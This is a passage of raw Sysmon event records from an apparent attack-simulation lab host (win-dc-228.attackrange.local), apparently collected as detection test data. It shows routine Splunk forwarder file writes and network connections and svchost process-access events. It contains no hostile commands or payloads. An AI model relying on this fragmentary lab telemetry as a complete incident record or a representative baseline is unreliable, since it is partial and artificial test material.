Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201978Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:19.427{5ABCFE62-E82F-6040-164E-00000000AD01}6804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201977Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:19.223{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39DF47A8F7C4C1EEC65724D4733BBA3D,SHA256=02FA122D6CDBE6AB0165226210E331D2A6CE389B35668D235696323D797C41D1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201990Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:16.934{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60595-false10.0.1.12-8000- 23542300x80000000000000002201989Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:20.238{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCEA573BA69980B0640C2C3AB8E66E81,SHA256=9263C66CDAD7D5E9E4C8F8A047D84A157CC31334CD39EA6B5CBD1AAB883653A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201991Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:21.285{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=439EBB980665EDBB2A467A34252268A1,SHA256=8A427B9241A66D64F422DF944143CFAC4E9B12B18FDB034A9032F6648C3661EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201993Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:22.520{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F68EB7FF68ACAC0016D7E78FDE56B7F,SHA256=8084F9042B22C0FD20080654DCA04D41D5DBC4EB3F02BBE9CAD0E90F79EAA2D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201992Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:22.207{5ABCFE62-842F-603E-1100-00000000AD01}620NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=BCD6B42A623AC3504387797C17E589E4,SHA256=CCBECAEAEBEE7E082719F32EF5907E0477E18897767428FB9F13601A75FEE6EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201995Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:23.535{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48F123DD02900404593398C276AF6ED6,SHA256=9E582969AE98B7AE3C9BF6760BB5DA59273485F3CE70147C075D7D002279A220,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201994Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:23.145{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=149B6BB3F858A76252B5BFE0C07C3C94,SHA256=C635A40C563F3C540DFF404DAAABDFDDDE2D40727BDF5A581572F504D718E677,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201996Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:24.535{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DA9936BB4CB979F37DEA2900AADC43C,SHA256=A702AEA79340F0AFB2E0EC94632453FCA6A1C4DC2227CD1F4FF77101CCB62EF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201999Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:25.551{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E8D4E4EE34C42E33B03FF9C52447B8D,SHA256=95B058582E8DBA622EBE4071E26B09B50919EF798A4DE6BE3F718C9BC8214266,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201998Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:21.981{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60596-false10.0.1.12-8000- 23542300x80000000000000002201997Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:25.145{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=39FAAC8D111D0FFE15497BD77E56F730,SHA256=8706FFF803BFB97A9A8E6011F25A7578B5F7805E63627BDF50AFD9F78AB4D9A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202000Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:26.582{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1336FB8C0DF0419049D48A17D5D7BF3,SHA256=BB4B293997F6C9171DF3A73A6EA689B9FF427BB01D255C9EBB11ABE2F65D17CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202001Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:27.645{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1095956D067C197AD51FBAEA4A7B1330,SHA256=F377121DCBBC9569305860352FC6A3F074C71820043FA41D5CE357B2979F893D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202002Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:28.660{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D22C74CB717B652D458E9D1FA24BAC4,SHA256=3C56A78F8895252D604A37067A4FD4E1B6B3DEF3014027A799239891993852DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202003Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:29.879{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1ED5E48CACB10F7C69A2D35C42D4BF59,SHA256=AC4F7A26E2D80DAA6ACA842EDE60CD8488AD5AAA7B89A1A6FD2BC5DEF3D459A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202007Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:30.910{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBCB0A9279462147B1DE339CE21B555A,SHA256=85B6169D7619569AA996F0BA89D23CB4B51BA555E4F294AD89B02B14F4788FBC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202006Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:27.028{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60597-false10.0.1.12-8000- 23542300x80000000000000002202005Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:30.207{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1BE6030B834067751A1621ADC0269BA1,SHA256=554BFFF5E1470AE9E061B69C4F5A68CB709CCEB569D400FC8A783B494119BB35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202004Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:30.207{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F6E88BD87FDF01A559CC96A9F3A067F4,SHA256=2C46791913811A5AB736DA62ACE517CE0C839006B4785D5AC55699C7FBF2F43B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202008Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:31.926{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E32693E9213174D7ED0235BCDFB72813,SHA256=AF7DA3E947761A9D59CE0B7709663A62161B214CB60E1DAAC25ECF7BB82F2756,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202009Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:32.957{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E78DB42638C79AB9C7F928484920EA7,SHA256=D3E4281E10954117F53BE7928C15DE38DCB62D9BA1A7BEE648C89571D0A03E2C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202044Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202043Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202042Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202041Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202040Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202039Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202038Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202037Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202036Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202035Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202034Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202033Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202032Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202031Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202030Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202029Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:34.629{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 